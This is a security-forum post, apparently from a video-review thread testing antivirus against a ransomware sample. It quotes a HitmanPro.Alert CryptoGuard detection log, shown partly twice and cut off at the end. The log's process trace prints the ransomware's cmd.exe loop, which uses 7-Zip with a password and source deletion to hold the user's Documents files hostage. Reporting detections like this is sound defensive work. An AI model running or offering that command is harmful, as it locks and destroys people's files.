Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Video Reviews - Security and Privacy
Kaspersky Security Cloud Free vs Ransominator (default settings)
Message
<blockquote data-quote="Vitali Ortzi" data-source="post: 876715" data-attributes="member: 57714"><p>[SPOILER="Hitman Pro Alert ignore Symantec as it was disabled "]</p><p>Log Name: Application</p><p>Source: HitmanPro.Alert</p><p>Date: 27/04/2020 0:43:03</p><p>Event ID: 911</p><p>Task Category: Mitigation</p><p>Level: Error</p><p>Keywords: Classic</p><p>User: N/A</p><p>Computer: DESKTOP-9TB3DOM</p><p>Description:</p><p>Mitigation CryptoGuard</p><p>Timestamp 2020-04-26T21:43:03</p><p></p><p>Platform 10.0.17763/x64 v871 06_17%</p><p>PID 4132</p><p>Application C:\Program Files\7-Zip\7z.exe</p><p>Created 2020-03-17T07:34:42</p><p>Description 7-Zip Console 18.6</p><p></p><p>Filename C:\Program Files\7-Zip\7z.exe</p><p></p><p>Detection Generic.Ransom.C</p><p></p><p> 1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3</p><p> Created L0, Write T8620544 H8620196|^259 #1,2</p><p></p><p> 2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip</p><p> Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1</p><p></p><p> 3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat</p><p> Opened L237576, Read T238080|100% H237576|100%|^119672 #3</p><p></p><p> 4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #4</p><p></p><p> 5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #5</p><p></p><p> 6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #6</p><p></p><p> 7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #7</p><p></p><p> 8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip</p><p> Opened, Deleted L19238769 P4984 #9</p><p></p><p> 9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3</p><p> Created L0, Write T19239424 H19239254|^236 P4984 #10,11</p><p></p><p>10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip</p><p> Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10</p><p></p><p>11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat</p><p> Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12</p><p></p><p>12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13</p><p></p><p>13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14</p><p></p><p>14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15</p><p></p><p>15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16</p><p></p><p>16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip</p><p> Opened, Deleted L4372785 P3368 #18</p><p></p><p>17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3</p><p> Created L0, Write T4373504 H4373093|^306 P3368 #19,20</p><p></p><p>18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip</p><p> Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19</p><p></p><p>25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3</p><p> Created L0, Write T5794304 H5793920|^251 P1504 #28,29</p><p></p><p>26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip</p><p> Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28</p><p></p><p>33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3</p><p> Created L0, Write T5743104 H5743005|^277 P5240 #38,39</p><p></p><p>34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip</p><p> Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38</p><p></p><p></p><p></p><p>Loaded Modules (23)</p><p>-----------------------------------------------------------------------------</p><p>0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov), </p><p> Version: 18.6.0.0</p><p>00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.), </p><p> Version: 3.8.4.871</p><p>00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation), </p><p> Version: 14.2.5536.2100</p><p>000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation), </p><p> Version: 17.2.1.16</p><p>00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1131</p><p>00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation), </p><p> Version: 7.0.17763.475</p><p>00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1075</p><p>00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.864</p><p>00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.914</p><p>00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.719</p><p>00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.678</p><p>00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.592</p><p>00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation), </p><p> Version: 10.0.17763.719</p><p>000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov), </p><p> Version: 18.6.0.0</p><p></p><p>Process Trace</p><p>1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03</p><p> "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents</p><p>2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57</p><p> C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"</p><p>3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57</p><p>4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07</p><p>5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s</p><p>6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56</p><p> winlogon.exe</p><p>7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms</p><p> \SystemRoot\System32\smss.exe 000000dc 00000084 </p><p>8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29</p><p> \SystemRoot\System32\smss.exe</p><p></p><p>Dropped Files</p><p>1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo & Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3</p><p> Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]</p><p>1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>12 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5802.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>13 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5803.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>14 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5814.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>15 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm5815.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>16 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>17 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>18 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>19 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>20 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>21 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>22 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>23 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>24 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>25 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>26 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>27 C:\Users\admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000136.db</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p></p><p>Thumbprints</p><p>5ea4a9f95efe0979bc5e8ff5137ee4ef035231fce07e136c41611e8a79c49f1c</p><p></p><p>Event Xml:</p><p><Event xmlns="<a href="http://schemas.microsoft.com/win/2004/08/events/event" target="_blank">http://schemas.microsoft.com/win/2004/08/events/event</a>"></p><p> <System></p><p> <Provider Name="HitmanPro.Alert" /></p><p> <EventID Qualifiers="0">911</EventID></p><p> <Level>2</Level></p><p> <Task>9</Task></p><p> <Keywords>0x80000000000000</Keywords></p><p> <TimeCreated SystemTime="2020-04-26T21:43:03.542132400Z" /></p><p> <EventRecordID>9047</EventRecordID></p><p> <Channel>Application</Channel></p><p> <Computer>DESKTOP-9TB3DOM</Computer></p><p> <Security /></p><p> </System></p><p> <EventData></p><p> <Data>C:\Program Files\7-Zip\7z.exe</Data></p><p> <Data>CryptoGuard</Data></p><p> <Data>Mitigation CryptoGuard</p><p>Timestamp 2020-04-26T21:43:03</p><p></p><p>Platform 10.0.17763/x64 v871 06_17%</p><p>PID 4132</p><p>Application C:\Program Files\7-Zip\7z.exe</p><p>Created 2020-03-17T07:34:42</p><p>Description 7-Zip Console 18.6</p><p></p><p>Filename C:\Program Files\7-Zip\7z.exe</p><p></p><p>Detection Generic.Ransom.C</p><p></p><p> 1*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3</p><p> Created L0, Write T8620544 H8620196|^259 #1,2</p><p></p><p> 2*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip</p><p> Opened L8619687, Read T8620032|100% H17239374|200%|^70365 #2,1</p><p></p><p> 3 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat</p><p> Opened L237576, Read T238080|100% H237576|100%|^119672 #3</p><p></p><p> 4 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #4</p><p></p><p> 5 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #5</p><p></p><p> 6 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #6</p><p></p><p> 7 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 #7</p><p></p><p> 8 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip</p><p> Opened, Deleted L19238769 P4984 #9</p><p></p><p> 9*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip.geminis3</p><p> Created L0, Write T19239424 H19239254|^236 P4984 #10,11</p><p></p><p>10*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Disney Sports - Football + Disney Sports - Skateboarding (Europe) (En,Fr,De,Es,It).zip</p><p> Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10</p><p></p><p>11 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\Definitions\IPSDefs\20200424.061\idspep.dat</p><p> Opened L237576, Read T238080|100% H237576|100%|^119672 P4984 #12</p><p></p><p>12 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13</p><p></p><p>13 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #14</p><p></p><p>14 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #15</p><p></p><p>15 \Device\HarddiskVolume1\ProgramData\Symantec\Symantec Endpoint Protection\14.2.5587.2100.105\Data\IPS\IDSSettg.dat</p><p> Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #16</p><p></p><p>16 \Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip</p><p> Opened, Deleted L4372785 P3368 #18</p><p></p><p>17*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip.geminis3</p><p> Created L0, Write T4373504 H4373093|^306 P3368 #19,20</p><p></p><p>18*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - NightFire (USA, Europe) (En,Fr,De).zip</p><p> Opened L4372785, Read T4372992|100% H8745570|200%|^38398 P3368 #20,19</p><p></p><p>25*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip.geminis3</p><p> Created L0, Write T5794304 H5793920|^251 P1504 #28,29</p><p></p><p>26*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (USA, Europe) (En,Fr,De).zip</p><p> Opened L5793576, Read T5793792|100% H11587152|200%|^15566 P1504 #29,28</p><p></p><p>33*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip.geminis3</p><p> Created L0, Write T5743104 H5743005|^277 P5240 #38,39</p><p></p><p>34*\Device\HarddiskVolume1\Users\admin\Documents\Nintendo - Game Boy Advance\007 - Everything or Nothing (Japan).zip</p><p> Opened L5742712, Read T5743104|100% H11485424|200%|^16437 P5240 #39,38</p><p></p><p></p><p></p><p>Loaded Modules (23)</p><p>-----------------------------------------------------------------------------</p><p>0000000000DD0000-0000000000E48000 7z.exe (Igor Pavlov), </p><p> Version: 18.6.0.0</p><p>00007FFB36470000-00007FFB3665D000 ntdll.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32240000-00007FFB32358000 hmpalert.dll (SurfRight B.V.), </p><p> Version: 3.8.4.871</p><p>00007FFB36380000-00007FFB36433000 KERNEL32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32630000-00007FFB328C5000 KERNELBASE.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>000000006DA90000-000000006DB23000 SYSFER.DLL (Symantec Corporation), </p><p> Version: 14.2.5536.2100</p><p>000000006D670000-000000006D998000 IPSEng64.dll (Symantec Corporation), </p><p> Version: 17.2.1.16</p><p>00007FFB339F0000-00007FFB33A93000 ADVAPI32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1131</p><p>00007FFB34710000-00007FFB347AE000 msvcrt.dll (Microsoft Corporation), </p><p> Version: 7.0.17763.475</p><p>00007FFB33F80000-00007FFB3401E000 sechost.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1075</p><p>00007FFB337E0000-00007FFB33902000 RPCRT4.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.864</p><p>00007FFB337D0000-00007FFB337D8000 PSAPI.DLL (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB35EF0000-00007FFB35FB4000 OLEAUT32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.914</p><p>00007FFB32CE0000-00007FFB32D80000 msvcp_win.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB32BE0000-00007FFB32CDA000 ucrtbase.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.719</p><p>00007FFB33AA0000-00007FFB33DCC000 combase.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32B60000-00007FFB32BDE000 bcryptPrimitives.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.678</p><p>00007FFB36130000-00007FFB362C7000 USER32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB32610000-00007FFB32630000 win32u.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1</p><p>00007FFB34180000-00007FFB341A9000 GDI32.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.592</p><p>00007FFB334F0000-00007FFB33689000 gdi32full.dll (Microsoft Corporation), </p><p> Version: 10.0.17763.1158</p><p>00007FFB34630000-00007FFB3465E000 IMM32.DLL (Microsoft Corporation), </p><p> Version: 10.0.17763.719</p><p>000000006D4C0000-000000006D665000 7z.dll (Igor Pavlov), </p><p> Version: 18.6.0.0</p><p></p><p>Process Trace</p><p>1 C:\Program Files\7-Zip\7z.exe [4132] 2020-04-26T21:43:03</p><p> "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3" "C:\Users\admin\Documents</p><p>2 C:\Windows\System32\cmd.exe [4380] 2020-04-26T21:42:57</p><p> C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p32113 "%d.geminis3" "%d"</p><p>3 C:\Users\admin\Desktop\InventarioBodega.exe [4388] 2020-04-26T21:42:57</p><p>4 C:\Windows\explorer.exe [4556] 2020-04-26T18:17:07</p><p>5 C:\Windows\System32\userinit.exe [4532] 2020-04-26T18:17:04 19.4s</p><p>6 C:\Windows\System32\winlogon.exe [736] 2020-04-26T18:14:56</p><p> winlogon.exe</p><p>7 C:\Windows\System32\smss.exe [636] 2020-04-26T18:14:55 518ms</p><p> \SystemRoot\System32\smss.exe 000000dc 00000084 </p><p>8 C:\Windows\System32\smss.exe [392] 2020-04-26T18:14:29</p><p> \SystemRoot\System32\smss.exe</p><p></p><p>Dropped Files</p><p>1 C:\Users\admin\Documents\Nintendo - Game Boy Advance\2 Disney Games - Lilo &amp; Stitch 2 + Peter Pan - Return to Neverland (Europe) (En,Fr,De,Es+En,Fr,De,Es,It,Nl).zip.geminis3</p><p> Dropped by \Device\HarddiskVolume1\PROGRA~1\7-Zip\7z.exe [4132]</p><p>1 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm574B.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>2 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AA.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>3 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57AB.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>4 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BB.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>5 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BC.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>6 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57BD.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>7 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CE.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>8 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57CF.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>9 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D0.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>10 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57D1.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>11 C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\ThumbCacheToDelete\thm57E2.tmp</p><p> Dropped by \Device\HarddiskVolume1\Windows\explorer.exe [4556]</p><p>12 